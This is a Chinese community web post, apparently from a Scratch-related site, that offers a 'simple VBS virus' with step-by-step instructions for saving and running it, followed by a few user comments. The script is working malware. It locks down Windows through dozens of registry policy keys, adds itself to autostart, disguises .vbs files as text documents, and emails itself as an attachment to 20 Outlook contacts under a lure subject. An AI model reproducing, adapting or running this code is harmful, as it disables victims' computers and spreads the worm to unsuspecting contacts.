作者:会做网页没钱买域名的code主
会做网页没钱买域名的code主
covers
内容简介:高端的食材往往使用最朴实的方法
2023/06/16 13:31

一个简单的vbs病毒(有毒)

本代码危险性高,不推荐引用

运行后及时向作者要解毒代码,否则后果自负!

解毒代码请访问

请勿改变解毒程序中的任意字符

病毒代码如下

On Error Resume Next Set fs=CreateObject(“Scripting.FileSystemObject”) Set dir1=fs.GetSpecialFolder(0) Set dir2=fs.GetSpecialFolder(1) Set so=CreateObject(“Scripting.FileSystemObject”) dim r Set r=CreateObject(“Wscript.Shell”) r.Regwrite “HKLM\Software\classes\vbsfile\defaulticon”,“shell32.dll,-152” r.Regwrite “HKLM\Software\classes\vbsfile”,“文本文档” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,63000000,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,1,“REG_DWORD” r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry”,“” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode”,1,“REG_DWORD” r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system”,“Win32system.vbs” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”,1,“REG_DWORD” r.Regwrite “HKLM\Software\CLASSES.reg”,“txtfile” r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,“你好!” r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,“你的电脑已经毁掉。请立即更新。” Set ol=CreateObject(“Outlook.Application”) On Error Resume Next For x=1 To 20 Set Mail=ol.CreateItem(0) Mail.to=ol.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x) Mail.Subject=“你没事吧?” Mail.Body=“我给你发了一个邮件,里面有妙方。” Mail.Attachments.Add(dir2&“Win32system.vbs”) Mail.Send Next ol.Quit r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock”,1,“REG_DWORD” r.Regwrite “HKEY_USERS.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page”,“https://www.baidu.com/” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions”,1,“REG_DWORD” r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”,1,“REG_DWORD”

注意:一定要新建文本文档(.txt),ctrl+a代码后ctrl+c再ctrl+v到文档里,保存好后,把后缀改为.vbs

操作步骤不会请加qq:1534616610

快捷方式:直接加bcrd的QQ群里找到文件

二维码 文件地方 样例

评论区

登录之后才能评论Scratch作品哦
帅锅00910 个月前

我的电脑不会有逝吧 不会的话我就试试

帅锅00910 个月前
@帅锅009

ok,试了,杀毒软件直接把他给删掉了

scrach爱好者10 个月前
@帅锅009

我觉得是删注册表

帅锅00910 个月前
@scrach爱好者

是杀毒软件把这个代码的源文件给删掉了

scrach爱好者10 个月前

删注册表是吧